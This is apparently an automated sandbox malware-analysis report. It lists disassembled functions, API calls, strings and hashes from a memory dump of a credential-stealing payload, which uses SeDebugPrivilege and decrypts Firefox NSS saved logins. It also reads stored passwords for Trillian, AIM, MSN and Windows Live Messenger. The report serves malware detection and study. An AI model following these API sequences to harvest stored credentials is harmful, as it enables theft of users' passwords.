strncmp 8000->8001 8001->7998 8001->7999 8001->8000 8002 412c93 memcpy 8001->8002 8003 412c0b memcpy atoi WideCharToMultiByte 8001->8003 8005 406d5a strtoul 8002->8005 8003->8001 8005->8001 8006->7972 8007->7974 8008->6899 8009->6919 8020 40f94e 8010->8020 8013 40f946 8013->6919 8014 40f8c8 memcmp 8014->8013 8015 40f8df 8014->8015 8015->8013 8016 40f94e 3 API calls 8015->8016 8019 40f8f5 8016->8019 8017 40f94e 3 API calls 8017->8019 8019->8013 8019->8017 8025 40f689 8019->8025 8021 40f960 SetFilePointer 8020->8021 8022 40f96e memset 8020->8022 8021->8022 8023 406ed6 ReadFile 8022->8023 8024 40f8c4 8023->8024 8024->8013 8024->8014 8026 40f696 8025->8026 8027 40f806 8026->8027 8028 40f94e 3 API calls 8026->8028 8027->8019 8029 40f6ca 8028->8029 8029->8027 8030 40f94e 3 API calls 8029->8030 8031 40f6e7 8030->8031 8032 40f94e 3 API calls 8031->8032 8035 40f779 8031->8035 8034 40f710 _strcmpi 8032->8034 8034->8035 8036 40f734 _strcmpi 8034->8036 8035->8027 8037 40f789 _strcmpi 8035->8037 8055 40f5c1 8035->8055 8036->8035 8038 40f74b _strcmpi 8036->8038 8040 40f80b 8037->8040 8041 40f79d _strcmpi 8037->8041 8038->8035 8039 40f762 _strcmpi 8038->8039 8039->8035 8042 40f5c1 2 API calls 8040->8042 8041->8040 8043 40f7b1 _strcmpi 8041->8043 8045 40f822 8042->8045 8043->8040 8044 40f7c5 _strcmpi 8043->8044 8044->8040 8046 40f7d9 _strcmpi 8044->8046 8045->8027 8047 40f826 _mbscpy 8045->8047 8046->8035 8046->8040 8048 40f84e 8047->8048 8048->8027 8049 40f5c1 2 API calls 8048->8049 8050 40f83a _strcmpi 8048->8050 8049->8048 8050->8048 8051 40f869 8050->8051 8052 40f5c1 2 API calls 8051->8052 8053 40f87f 8052->8053 8053->8027 8054 40f883 _mbscpy 8053->8054 8054->8027 8056 40f649 8055->8056 8057 40f5d8 8055->8057 8056->8035 8057->8056 8058 40f61e memcpy 8057->8058 8058->8056 8059 40f65a 8058->8059 8059->8056 8060 40f666 _ultoa 8059->8060 8060->8056 8061 41208b FindResourceA 8062 4120a4 SizeofResource 8061->8062 8065 4120ce 8061->8065 8063 4120b5 LoadResource 8062->8063 8062->8065 

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00410DF0
  • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken,00000000,00000000,004044F8,000000FF,0000000E,?,?,0040428D), ref: 00410DC0
• GetLastError.KERNEL32(00000000), ref: 00410E02
• GetProcAddress.KERNEL32(?,LookupPrivilegeValueA,?,?,00000000), ref: 00410E24
• LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?,?,LookupPrivilegeValueA,?,?,00000000), ref: 00410E34
• GetProcAddress.KERNEL32(?,AdjustTokenPrivileges,?,?,00000000), ref: 00410E5A
• AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,AdjustTokenPrivileges,?,?,00000000), ref: 00410E6B
• CloseHandle.KERNELBASE(?), ref: 00410E78
Strings
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessTokenValue
• String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeDebugPrivilege
• API String ID: 3328644959-164648368
• Opcode ID: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
• Instruction ID: 180035a187f8386c87a779d0175683d60653c8262eee481a5a772ffe12dd7b09
• Opcode Fuzzy Hash: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
• Instruction Fuzzy Hash: D2117371900205FBDB11ABE5DC85AEF7BBCEB48344F10442AF501E2151DBB99DC18BA9
APIs
• FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
• FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
• strlen.MSVCRT ref: 004078FC
• strlen.MSVCRT ref: 00407904
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: FileFindstrlen$FirstNext
• String ID:
• API String ID: 379999529-0
• Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
• Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
• Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
• Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755

Control-flow Graph

APIs
  • Part of subcall function 00404D7A: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
  • Part of subcall function 00404D7A: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
  • Part of subcall function 00404D7A: FreeLibrary.KERNEL32(00000000), ref: 00404DBF
  • Part of subcall function 00404D7A: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
• FreeLibrary.KERNEL32(?), ref: 0040C6A7
• EnumResourceTypesA.KERNEL32(00412111,00000000), ref: 0040C6C3
• MessageBoxA.USER32(00000000,Failed to load the executable file !,Error,00000030), ref: 0040C6E5
Strings
Memory Dump Source
• Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
Similarity
• API ID: Library$FreeMessage$AddressEnumLoadProcResourceTypes
• String ID: /deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MessenPass$f-@
• API String ID: 1343656639-3807849023
• Opcode ID: bbacde5a5cd21ba3b0067782a62bd30c38fe63f76bbb2082e6cf8d62c0ef1d45
• Instruction ID: c9cf7fae9a68988a057e6d0076c0e2abe6ed6f3ff992c821ff985c928f871611
• Opcode Fuzzy Hash: bbacde5a5cd21ba3b0067782a62bd30c38fe63f76bbb2082e6cf8d62c0ef1d45
• Instruction Fuzzy Hash: 7661917190420AEBDF21AF61DD89ADE3BB8BF84305F10817BF905A21A0DB389945DF5D

Control-flow Graph

APIs
• memset.MSVCRT ref: 00405EE7
• memset.MSVCRT ref: 00405EFF
  • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
• memset.MSVCRT ref: 00405F3A
  • Part of subcall function 00411DEE: RegEnumKeyExA.KERNEL32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
• _mbsnbicmp.MSVCRT ref: 00405F68
• memset.MSVCRT ref: 00405F87
• memset.MSVCRT ref: 00405FA0
• _snprintf.MSVCRT ref: 00405FB9
• _mbsrchr.MSVCRT ref: 00405FDE
• _mbsicmp.MSVCRT ref: 00406012
• _mbscpy.MSVCRT(?,?), ref: 0040602B
• _mbscpy.MSVCRT(?,?,?,?), ref: 0040603E
• RegCloseKey.ADVAPI32(?), ref: 0040606C
• _mbscpy.MSVCRT(?,?), ref: 0040607A
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
• GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                                                                                                                                    • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                                                                                                                    • API String ID: 201549630-2797892316
                                                                                                                                                                                    • Opcode ID: dd6206d5936df01191ee13b9ca55f0c83b93ca1a2f1ec4be9d581242c1b61764
                                                                                                                                                                                    • Instruction ID: a9db27f8d3bb6867008f3f8c7ab71477537d255c6bc9b4b6a3b98ebc98dd088a
                                                                                                                                                                                    • Opcode Fuzzy Hash: dd6206d5936df01191ee13b9ca55f0c83b93ca1a2f1ec4be9d581242c1b61764
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F51B7B184015DBADB21DB619C86EDF7BBC9F15304F0004FAB548E2142EA789FC58BA5

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                      • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                                                                                                                                                                      • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                                                                                                                                                                      • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                                                                                                                                                                      • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                                                                                                                                                                      • Part of subcall function 00405EC5: _mbscpy.MSVCRT(?,?), ref: 0040607A
                                                                                                                                                                                      • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                                                                                                                                                                      • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                    • memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                    • strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                    • strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                                                                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
                                                                                                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                                                                                                                                                                    • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                                                    • API String ID: 2719586705-3659000792
                                                                                                                                                                                    • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                                                                    • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
                                                                                                                                                                                    • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54

                                                                                                                                                                                     Control-flow Graph (function 00407C79-00407DC2; graph image not rendered in text, API calls listed below)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00407CDB
                                                                                                                                                                                    • memset.MSVCRT ref: 00407CEF
                                                                                                                                                                                    • memset.MSVCRT ref: 00407D09
                                                                                                                                                                                    • memset.MSVCRT ref: 00407D1E
                                                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407D91
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407DA0
                                                                                                                                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                                                                                                    • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                    • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5

                                                                                                                                                                                     Control-flow Graph (function 004064FB-004066E0; graph image not rendered in text, API calls listed below)
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                      • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                      • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                      • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                      • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                      • Part of subcall function 00410C4C: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                                                                                                                                                    • memset.MSVCRT ref: 00406537
                                                                                                                                                                                      • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                                                                                                      • Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                    • memset.MSVCRT ref: 0040657E
                                                                                                                                                                                    • memset.MSVCRT ref: 00406596
                                                                                                                                                                                    • memset.MSVCRT ref: 004065AE
                                                                                                                                                                                    • strlen.MSVCRT ref: 004065B9
                                                                                                                                                                                    • strlen.MSVCRT ref: 004065C7
                                                                                                                                                                                    • strlen.MSVCRT ref: 004065F2
                                                                                                                                                                                    • strlen.MSVCRT ref: 00406600
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040662B
                                                                                                                                                                                    • strlen.MSVCRT ref: 00406639
                                                                                                                                                                                      • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                                                                                                      • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                                                                                                                                                                      • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                                                                                                                                                                      • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
                                                                                                                                                                                      • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
                                                                                                                                                                                      • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
                                                                                                                                                                                      • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
                                                                                                                                                                                      • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT(?), ref: 004064E5
                                                                                                                                                                                      • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetstrlen$AddressProc$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
                                                                                                                                                                                    • String ID: signons.txt$signons2.txt$signons3.txt
                                                                                                                                                                                    • API String ID: 4081699353-561706229
                                                                                                                                                                                    • Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                                                                                                    • Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                                                                                                    • Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58

Control-flow Graph (rendered graph omitted; nodes and edges not reproducible in text)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D3C8
                                                                                                                                                                                      • Part of subcall function 00411DAE: RegCloseKey.KERNEL32(00000000,?,00000000,00000000), ref: 00411DE3
                                                                                                                                                                                    • _mbscpy.MSVCRT(00403A14,00000000,?,?,?,?,?,00000000,00000000), ref: 0040D41B
                                                                                                                                                                                    • _mbscpy.MSVCRT(00403A14,00000000,?,?,?,?,?,00000000,00000000), ref: 0040D464
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D47C
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040D49D
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040D4AB
                                                                                                                                                                                      • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
                                                                                                                                                                                      • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
                                                                                                                                                                                      • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
                                                                                                                                                                                      • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$_mbscpymemset$AttributesCloseFile_memicmp
                                                                                                                                                                                    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian$Trillian\users\global$UninstallString$trillian$trillian.exe
                                                                                                                                                                                    • API String ID: 2174551368-3003071570
                                                                                                                                                                                    • Opcode ID: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
                                                                                                                                                                                    • Instruction ID: 7bc3b858bee9d9e9ac8f81dd2a2494a9b2267e2ac629f59b21fbbbeb3bb54d2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 72312B7290421469E720AA659C46BDF3B988F11715F20007FF548F71C2DEBCAAC487AD

Control-flow Graph (rendered graph omitted; nodes and edges not reproducible in text)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,7701485B,00000000,?,0040DCC1,?), ref: 0041041E
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,Dynamic Salt,00000000,00020019,?,?,7701485B,00000000,?,0040DCC1,?), ref: 00410436
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,7701485B,00000000,?,0040DCC1), ref: 0041045F
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,7701485B,00000000,?,0040DCC1), ref: 00410509
                                                                                                                                                                                      • Part of subcall function 00404C9D: LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
                                                                                                                                                                                      • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData,?,?), ref: 00404CBC
                                                                                                                                                                                    • memcpy.MSVCRT(?,0041B008,00000040,7701485B,?,?,?,7701485B,00000000), ref: 004104C8
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 004104DD
                                                                                                                                                                                      • Part of subcall function 004100A4: RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,0041B008,?,?,004104FD,?,?,?,?), ref: 004100C8
                                                                                                                                                                                      • Part of subcall function 004100A4: memset.MSVCRT ref: 004100EA
                                                                                                                                                                                      • Part of subcall function 004100A4: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
                                                                                                                                                                                      • Part of subcall function 004100A4: RegCloseKey.ADVAPI32(?), ref: 004101F8
                                                                                                                                                                                    • LocalFree.KERNEL32(0040DCC1,7701485B,?,?,?,7701485B,00000000), ref: 00410500
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,7701485B,00000000,?,0040DCC1,?), ref: 00410512
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                    • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                    • API String ID: 2768085393-888555734
                                                                                                                                                                                    • Opcode ID: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                                                                                                                                                                    • Instruction ID: a3322e4f6880ec2e25c1dd16e8e651f617ea5ab7975a499ff40f994b3e8bdadf
                                                                                                                                                                                    • Opcode Fuzzy Hash: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                                                                                                                                                                    • Instruction Fuzzy Hash: B631E7B690011DABDB119B95EC45EEFBBBDEF48348F004066FA05F2111E7749A848BA8

Control-flow Graph (rendered graph omitted; nodes and edges not reproducible in text)
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3662548030-0
                                                                                                                                                                                    • Opcode ID: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
                                                                                                                                                                                    • Instruction ID: 1a0d48d648a4d99901fb7feaec5c467672ee51f091280c2f058e756afb183587
                                                                                                                                                                                    • Opcode Fuzzy Hash: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9841A071D00309DFDB209FA4D884AEE7BB4FB08715F20416BE46197291D7784AC2CB5C

Control-flow Graph (rendered graph omitted; nodes and edges not reproducible in text)
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
                                                                                                                                                                                      • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040DACB
                                                                                                                                                                                      • Part of subcall function 0040FF88: CredReadW.ADVAPI32(Passport.Net\*,00000004,00000000,?,7701485B), ref: 0040FFCF
                                                                                                                                                                                      • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
                                                                                                                                                                                      • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
                                                                                                                                                                                      • Part of subcall function 0040FF88: LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DB01
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\MessengerService,00000000,00020019,?,?), ref: 0040DB8F
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DC25
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • UserMicrosoft Exchange Instant Messaging, xrefs: 0040DC3B
                                                                                                                                                                                    • PasswordMicrosoft RTC Instant Messaging, xrefs: 0040DBA0
                                                                                                                                                                                    • Software\Microsoft\MSNMessenger, xrefs: 0040DAC1
                                                                                                                                                                                    • Software\Microsoft\MessengerService, xrefs: 0040DAF7, 0040DB85, 0040DC1B
                                                                                                                                                                                    • PasswordMicrosoft Exchange Instant Messaging, xrefs: 0040DC36
                                                                                                                                                                                    • UserMicrosoft RTC Instant Messaging, xrefs: 0040DBA5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open$ByteCharMultiWidememset$CredFreeLocalRead
                                                                                                                                                                                    • String ID: PasswordMicrosoft Exchange Instant Messaging$PasswordMicrosoft RTC Instant Messaging$Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService$UserMicrosoft Exchange Instant Messaging$UserMicrosoft RTC Instant Messaging
                                                                                                                                                                                    • API String ID: 2264331338-3472580514
                                                                                                                                                                                    • Opcode ID: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                                                                                                                                                                    • Instruction ID: 22d36e33a130c3ca974138f2eaaf9dbe6720f3348f6af52b077c8fd119907347
